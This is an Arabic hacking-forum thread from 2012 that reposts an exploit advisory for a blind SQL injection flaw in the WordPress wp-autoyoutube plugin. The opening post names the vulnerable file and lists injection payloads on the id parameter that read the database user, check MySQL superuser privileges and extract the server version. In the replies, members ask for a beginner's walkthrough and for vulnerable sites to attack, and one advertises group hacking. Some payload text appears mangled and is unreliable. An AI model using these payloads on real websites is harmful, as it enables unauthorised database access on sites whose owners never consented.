العودة   :: Security امان العرب Arab :: > The real World Of Hacking & Security > [ الـثـغـرات ]

الملاحظات

[ الـثـغـرات ] مكتبة خاصة بثغرات تطبيقات الويب تنزل اتوماتيك من مواقع السكيورتي

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 01-12-2012, 09:43 PM   المشاركة رقم: 1
الكاتب
killer-r
.:: عضو جديد ::.
المعلومات  
التسجيل: Dec 2011
العضوية: 122313
المشاركات: 20
بمعدل : 0.01 يوميا
killer-r is on a distinguished road
الإتصال killer-r غير متواجد حالياً


المنتدى  
:: new :: WordPress wp-autoyoutube plugin Blind SQL Injection

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته





اقتباس:
################################################## ####


# exploit title: Wordpress wp-autoyoutube plugin blind sql injection
vulnerability

# date: 2012-11-01

# author: Longrifle0x

# software: Wordpress

# download:[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

# tools: Sqlmap

################################################## ####

*description

discovered a vulnerability in wp-autoyoutube, wordpress plugin,

vulnerability is blind sql injection.

File:wp-content/plugins/wp-autoyoutube/modules/index.php

exploit: Id=-1; or 1=if

*exploitation*[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل][get][id=-1][current_user()

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل][get][id=-1][select(case
when ((select super_priv frommysql.user where user='none' limit

0,1)='y') then 1 else 0 end)

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل][get][id=-1][mid((version()),1,6

تشآآآآو












عرض البوم صور killer-r   رد مع اقتباس

قديم 01-13-2012, 03:14 AM   المشاركة رقم: 2
الكاتب
inhell212
.:: عضو ::.
المعلومات  
التسجيل: Dec 2011
العضوية: 118869
المشاركات: 39
بمعدل : 0.01 يوميا
inhell212 is on a distinguished road
الإتصال inhell212 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

ممكن شرح للمبتدئين ؟












عرض البوم صور inhell212   رد مع اقتباس

قديم 01-13-2012, 06:05 PM   المشاركة رقم: 3
الكاتب
killer-r
.:: عضو جديد ::.
المعلومات  
التسجيل: Dec 2011
العضوية: 122313
المشاركات: 20
بمعدل : 0.01 يوميا
killer-r is on a distinguished road
الإتصال killer-r غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

هوآ الشرح كدآمك حـبي












عرض البوم صور killer-r   رد مع اقتباس

قديم 01-20-2012, 08:23 PM   المشاركة رقم: 4
الكاتب
Dr.iTaChi
.:: عضو ::.
 
الصورة الرمزية Dr.iTaChi
المعلومات  
التسجيل: Dec 2011
العضوية: 121661
الدولة: Oman
المشاركات: 137
بمعدل : 0.05 يوميا
Dr.iTaChi is on a distinguished road
الإتصال Dr.iTaChi غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

وين الدورك شي نطبق على مواقع مصابه .. .












توقيع : Dr.iTaChi




سبحان الله , والحمد لله , ولا اله الأ الله

للتواصل وتبادل الخبرات مع أختراق جماعي :

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

.. .
عرض البوم صور Dr.iTaChi   رد مع اقتباس

قديم 01-26-2012, 01:18 PM   المشاركة رقم: 5
الكاتب
DR-rb3
.:: عضو جديد ::.
 
الصورة الرمزية DR-rb3
المعلومات  
التسجيل: Jan 2012
العضوية: 126031
المشاركات: 8
بمعدل : 0.00 يوميا
DR-rb3 is on a distinguished road
الإتصال DR-rb3 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكور خالي












توقيع : DR-rb3

DR-RB3

D@ho9mial.com
عرض البوم صور DR-rb3   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرِة في Wordpress Age Verification plugin <= 0.4 Open Redirect killer-r [ الـثـغـرات ] 2 01-11-2012 08:18 AM
WordPress plugin Comment tdo mini forms Upload File MMA_LORD_735 [ ثــغـرات الأعــضــاء] 11 07-22-2011 07:05 AM
Wordpress Plugin simple-forum Remote File Upload Vulnerability MaKKaWi [ الـثـغـرات ] 0 07-11-2009 06:58 PM
WBB Plugin rGallery 1.09 Blind SQL Injection Exploit Ghost Hacker [ الـثـغـرات ] 0 10-20-2008 12:42 AM
Wordpress Plugin Sniplets 1.1.2 (RFI/XSS/RCE) Multiple Vulnerabilities ShAfEKo4EvEr [ الـثـغـرات ] 5 04-02-2008 03:19 PM


الساعة الآن 08:52 PM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.